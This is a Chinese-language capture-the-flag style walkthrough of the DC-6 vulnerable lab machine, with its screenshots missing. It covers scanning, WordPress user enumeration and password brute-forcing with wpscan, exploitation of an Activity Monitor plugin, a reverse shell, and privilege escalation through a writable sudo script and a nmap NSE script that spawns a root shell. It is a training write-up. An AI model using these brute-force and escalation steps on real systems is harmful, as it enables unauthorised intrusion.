Skip to content

Latest commit

 

History

History
228 lines (124 loc) · 6.76 KB

DC-6.md

File metadata and controls

228 lines (124 loc) · 6.76 KB

先去看看DC-6的官网描述,看看有没有给出提示信息

image-20230807185122021

image-20230807185220691

image-20230807185304458

把这个线索信息先复制下来

cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt

开始前先要吧 kali和DC-6靶机放在统一网段,都换成NAT模式

然后看一下DC-6的MAC地址

image-20230807185603637

靶机的MAC地址00:0C:29:FA:57:22

信息收集

主机扫描

netdiscover -r 192.168.80.0/24

image-20230807204152324

端口扫描

nmap -A -T4 -p- 192.168.80.140

image-20230807204400100

发现靶机开起来80端口和22端口

根据DC-6靶场的文档描述,需要修改hosts文件

vim /etc/hosts   #靶机的地址和域名映射

image-20230807190408473

通过kali自带的浏览器访问靶机的80的端口

image-20230807190518659

发现是WordPress的站点,这跟DC-2的是一样的站点,那就可以跟DC-2一样用wpscan来扫描这个站点的漏洞

先爆破一下目录看看

dirsearch -u 192.168.80.140 -i 200

image-20230807211541514

使用御剑爆破一下

image-20230807210928594

进入登录页面,现在还不知道密码和账户,

image-20230807211339375

漏洞利用

使用wpscan进行枚举爆破用户名

wpscan --url http://wordy/ -e u   # 枚举 WordPress 站点中注册过的用户名,来制作用户名字典。

image-20230807211708308

把账户写进/tmp/user.txt文件里

现在有了账户,还没密码,需要用靶场文档描述里说的线索提示

cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt

image-20230807211905462

报错说没有目录,可以使用cd命令,过去看一看

image-20230807212014292

gunzip rockyou.txt.gz

image-20230807212132262

image-20230807212336871


image-20230807212734164

现在有了用户字典,有了密码字典,继续使用wpscan密码爆破

==注意==:是在/tmp目录下进行爆破

wpscan --url http://wordy/ -U user.txt -P passwords.txt # 调用相关的字典文件对网站进行爆破。

image-20230808104100218

image-20230808104037655

爆破完用mark helpdesk01做登录

image-20230807214339649

搜索Activity monitor这个插件有没有漏洞

image-20230807215324697

找一下漏洞的绝对路径

image-20230807215416791

用python执行这个脚本

image-20230807220925693

提权

新建一个终端,监听8989

image-20230807221024541

然后在刚才的终端里输入反弹shell

image-20230807221149955

已经监听到了

image-20230807221204336

使用python交互shell

python  -c "import pty;pty.spawn('/bin/bash')"

image-20230807221418750

在mark的家目录里发现有用的信息

image-20230807221648562

查看su graham切换用户,发现可以使用su这个命令

image-20230807221823126

使用sudo -l查看能使用哪些root权限的命令

image-20230807221908392

切换到jens的家目录看一下

image-20230807221954668

可以往里面追加/bin/bash

image-20230807222049870

使用sudo -u jens ./backups.sh

  • -u 指定用户

切换到了jens用户

image-20230807222251746

继续使用sudo -l 查看

image-20230807222325061

利用 nmap 提权

echo "os.execute('/bin/bash')" > shell.nse

image-20230807223133277

sudo -u root nmap --script=shell.nse
#以root用户执行namp脚本

image-20230807223257282

进入/root下查看有无文件

image-20230807223457255